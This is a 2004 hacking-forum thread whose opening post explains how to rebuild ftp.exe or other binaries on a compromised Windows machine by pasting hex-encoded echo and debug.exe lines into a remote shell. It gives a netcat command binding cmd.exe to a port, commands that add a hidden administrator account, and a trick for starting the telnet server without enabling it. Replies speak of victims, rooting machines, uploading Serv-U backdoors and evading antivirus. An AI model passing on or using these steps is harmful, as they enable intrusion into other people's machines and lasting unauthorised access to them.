I recommend to use a tool like SecureCRT, SSH1-2, Telnet Client (faster to copy/past the huge .txt) Copy paste all into securecrt, it creates ftp.bat, then run ftp.bat , it will create ftp.exe. Nb: I packed ftp.exe to make the debugging smaller. See page 2 to dl ftp.bat to test locally if you are too lazy to mod the txt. Of course for the guys who dunno , ftp.exe here is an example , you can update to another executable.
the .txt is also attached to the thread at the bottom. Tested on 9x/XP
//EDIT: 2k was bugging, sorry my mistake, fixed version see page 8.
etc.. etc ... 1096 lines .. to big for the threads .. look at the attached file
NOW SOME SMALL TIPS
TIP1: Thats easy to use SecureCRT in binding mode , you just have to connect with a telnet method the port, then copy past all the txt at 1 time. But in listening ?
your localip = 192.168.0.2 run a listening netcat1 : nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2 With SecureCRT , do a simple telnet connection on 192.168.0.2:12345 (youll have a shell of course on your own computer trough securecrt) Open now another listening netcat2 through this local sCRT shell, you'll be able finally to copy paste this huge txt if a victim spawn a shell to this netcat2 ;p
TIP2: You are on a system/admin rights shell without the possibility to copy paste the .txt ?
create a user
net user USER PASS /add net localgroup Administrators USER /add
type tlntsvr.exe , try to connect to the ip port 23 with SecureCRT, it will refuse. type a second time tlntsvr.exe, try to connect to the ip port 23 with SecureCRT, telnet server is now started without to be enabled.(yes I tested it succesfully)
login with your created USER/PASS. Your are know under a shell with Telnet & SecureCRT thats a big step.
But because you use telnet, you 'll have to copy past the lines 10 per 10. (I tested , it's not so long , and working)
I had finally a ftp.exe created with the help of a really bad shell at start.
***************
If you can't make it working nm , me i successfully used it on everybox where ftp/tftp were missing. You need of course some resources in your brain to find a way to copy paste the huge txt in all situations.
I hope my resources helped you , bye
sylver
Mar 14 2004, 08:29 AM
cool what a nice method
stonebreaker
Mar 14 2004, 08:55 AM
wonderful thanks for share it
archiv
Mar 14 2004, 09:01 AM
nice method thx .... but where can me dl the tool for faster copy/past ?!
thx
eXist
Mar 14 2004, 09:28 AM
Finding it on google isn't hard: hxxp://www.vandyke.com/products/securecrt/index.html Seek and you shall find what you're after.
Interesting method 101, not sure how practical it would be, interesting none the less.
Zyne
Mar 14 2004, 10:17 AM
This definitely seems like a nice "util"...
I'm gonna give it a test on my own machine, just to see what it does exactly...
Thanks a lot for putting thit together, and sharing this with us m8!
Zyne
temptation
Mar 14 2004, 10:56 AM
Hi, thx for this, but i dunno how it works ... I tried to rename the ftp.txt to ftp1.bat und executed it but it was not workin .. an idea?
[EDIT] Ok, now it is workin, sry i was 2 dumb 4 it :/
BuzzDee
Mar 14 2004, 11:04 AM
yes this method is nice!
i'm using it quite long now
but im doing the following: i create a server on the remote host. i have a little one which has about 10 kb. i just copy & paste it in the remote shell - then i start it and upload servu and so on with flashfxp
that way u never have probs with uploading the files
greetz
EzMe
Mar 14 2004, 11:23 AM
Whow! Never thought this was possible.. Kewl gonna try it
Lovellz
Mar 14 2004, 11:44 AM
Thanks alot for this class101.
annoying when u root a puter and they removed ftp.exe
thanks alot matey
boshcash
Mar 14 2004, 12:10 PM
wow nice way man , its a bit complicated but its the best and i think this wont be ever detected by AVs
xzbit
Mar 14 2004, 12:35 PM
big THX 101 for sharing this
TwitcH
Mar 14 2004, 12:56 PM
Methinks this could be useful.....
ZoraX
Mar 14 2004, 01:19 PM
thnx nice util:D anybody tested that the ftp.exe works?
xDD
Mar 14 2004, 01:36 PM
C:\WINNT\>ftp.exe ftp.exe
C:\WINNT\>
hmmm
WOrk u ? : |
PeOun
Mar 14 2004, 01:41 PM
thx a lot for this nice method
xDD
Mar 14 2004, 02:54 PM
Yeah this do fxp.exe but someone tested this ftp.exe and work ? :|
BuzzDee
Mar 14 2004, 03:07 PM
of course it worx. tested it locally and remotely. both ways worked fine. y shouldnt it work? ^^
xDD
Mar 14 2004, 03:10 PM
Mhmmm
i give this echo command
next ftp.bat run and execute ftp.exe and this file not work ... i will go testing again
101
Mar 14 2004, 03:28 PM
The .txt is the way to create this .bat from a cmd line with ECHO commands. here is the .bat if u wanan test direclty on your computer.
so, this thread is not to teach u how to use ftp.exe ... u can also do it with list.exe, kill.exe , ur backdoor y not ;Q , ftp is just a helpful example for who need ;<
xDD
Mar 14 2004, 03:45 PM
Yeah this bat work but i tested this echo command and i dont know but dont work but will testing again later :)
brOmstar
Mar 14 2004, 04:07 PM
fine thx..tested it locally
the ftp.exe is created, but when i try to use that ftp.exe i get an error but only on my w2k german sp4
on a remote machine w2k3 server eng it had worked very well !
but who cares the method is the key thx !
boshcash
Mar 14 2004, 06:03 PM
i wanna ask a question if i want to do any exe to convert it to text to be easily replaced with ftp.exe how can i do that
MattMannLT
Mar 14 2004, 06:54 PM
QUOTE (boshcash @ Mar 14 2004, 06:03 PM)
i wanna ask a question if i want to do any exe to convert it to text to be easily replaced with ftp.exe how can i do that
i think you could just use any hex editor
easternerd
Mar 14 2004, 07:33 PM
Innovation is the KeyWord i really Congratualte 101 for showing a very simple yet impressive method where we can take advantage of just the Swiss Army Knife alone.
Erra
Mar 14 2004, 08:17 PM
Nice idea.... will have to give it a go and see if I can get the thing working myself... like it though... good thinking!!
yopman
Mar 14 2004, 09:03 PM
nice idea, i have allready posted, itīs a the hex of an exe, and debug.exe, on all winows machine "compile" this to an exe. it dosnīt work on nt40 machines. you can allready use an other apps, like cmdget.exe only 1.5kb, download files from http://*. you can convert exe to the hex-format with bin2src, then you must change the header, in the first line from .exe to none executable extension like sys. txt or other, because debug.exe "canīt build a executable". after the compilation you change the *.txt to *.exe and you have a working exe.
BuzzDee
Mar 14 2004, 09:40 PM
@yopman: r u sure that u can convert it with bin2src? i searched with google, downloaded it and i found out that i can only convert exe-file into c, basic or pascal code with it... but we need hex code ^^
@101: which program did u use to convert the exe? would be nice if u could tell us
greetz, buzz
brOmstar
Mar 14 2004, 10:00 PM
after doing some research i found a handy tool called exe2hex
i would attach it here but here's no button to attach the file (cause i'm trial???)
found this in the board-helpsystem
If the admin has enabled it, you will also see a file attachments option, this will allow you to attach a file to be uploaded when making a post. Click the browse button to select a file from your computer to be uploaded. If you upload an image file, it may be shown in the content of the post, all other file types will be linked to.
???
btw. the tools works really perfekt..very simple usage
it shouldn't be a problem to create a bat or echo.txt based on the outputfile
x1`
Mar 14 2004, 10:17 PM
clever stuff its like u programmed it in binary on the computer wonderif u could do the same with servu or other apps how did u get the binary code for ftp.exe anyway?
brOmstar
Mar 14 2004, 10:20 PM
u need the hex code of the file not the binary ...how to do ? read one post above
btw this should work with any *.exe
G-Ryder
Mar 14 2004, 10:21 PM
The only trouble with cmdget.exe if I remember right is that it executes the file once it has been downloaded, so if u dont want the file to run you have to remove the extention when u specify where u want to save it.. eg c:\test not c:\test.exe but it would be alot smaller than ftp.exe so maybe its quicker
101
Mar 14 2004, 10:27 PM
the solution is maybe not so far,
njoy your research
(nother example , creates list.exe, process listener)
iWeasel410
Mar 14 2004, 10:31 PM
Wow this is interesting, nice find 101! But what advantes does this prove over other methods?
brOmstar
Mar 14 2004, 10:37 PM
i have written a handy tool in c# together with exe2hex u now need some seconds to create a createmyprogramm.bat ...
i have testet this method with nc.exe/ftp.exe/psinfo.exe works well =)
is it possible to allow me to attach files?
@iWeasel u don't have to upload anything !
Damned_Vampire
Mar 14 2004, 11:09 PM
great work thks for the info
Gotisch
Mar 14 2004, 11:26 PM
Nice tool (hehe ).
brOmstar send it to me ill attach it, or ask a mod to post the file for you.
yopman
Mar 14 2004, 11:52 PM
iīm sorry bin2dbg
brOmstar
Mar 15 2004, 12:27 AM
k gotisch i will send the both tools to you(think tomorrow in the morning)... together with an explaination how to use them =)
fry
Mar 15 2004, 05:04 AM
Thanx for the great info 101,thats some really great stuff,although br0mstar's program will be here soon and I can't add attatchments either,but i'll ad the websites link to the exe2hex program.
exe2hex C sourcecode:http://www.g615.co.uk/riftor/exe2hex.c
poostew
Mar 15 2004, 05:20 AM
this rocks.
The Storm
Mar 15 2004, 09:07 AM
Very nice work! Gonna test it very helpfull! Gonna try making a new method of breaking SQL_ERROR *g*
BigBen
Mar 15 2004, 09:49 AM
Thx very nice worked fine
Greetz
BigBen
FuzZyBeeR
Mar 15 2004, 10:23 AM
Heh This always comes in handy Thanx for this post! Tested it and it worked indeed
tribalgoa
Mar 15 2004, 12:01 PM
very interesting method ... will try it out asap and let you all know if it works
BuzzDee
Mar 15 2004, 12:42 PM
thx alot yopman! that was the one i was looking for
btw it worx with serv-u, too
nice nice nice...
greetz, buzz
boshcash
Mar 15 2004, 01:20 PM
i got exe2hex and everything worked fine , bromstar when u finish the program tell me to post it for u
Because programs automates many thing which are :
-adding echo to everyline and output to selected batch name that u want to be created -converting the exe to binary easily without command line -adding the n filename.sys line (did u successfully do this or the file created requires manual edit ?
Thanks alot for creator of this way , and when u get the program ready bromstar plz tell me
arn0ld
Mar 15 2004, 01:35 PM
realy usefull it's realy when there is not ftp.exe ( tested it and it works fine )
prog
Mar 15 2004, 02:07 PM
I used to do this sort of thing with linux. Glad nt has apapted it now.
tibbar
Mar 15 2004, 02:45 PM
interesting idea. personally, ive never encountered a situation where tftp and ftp were both not available, but i'll keep this one in reserve for that rainy day.
Cheers m8
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
).
when there is not ftp.exe
)
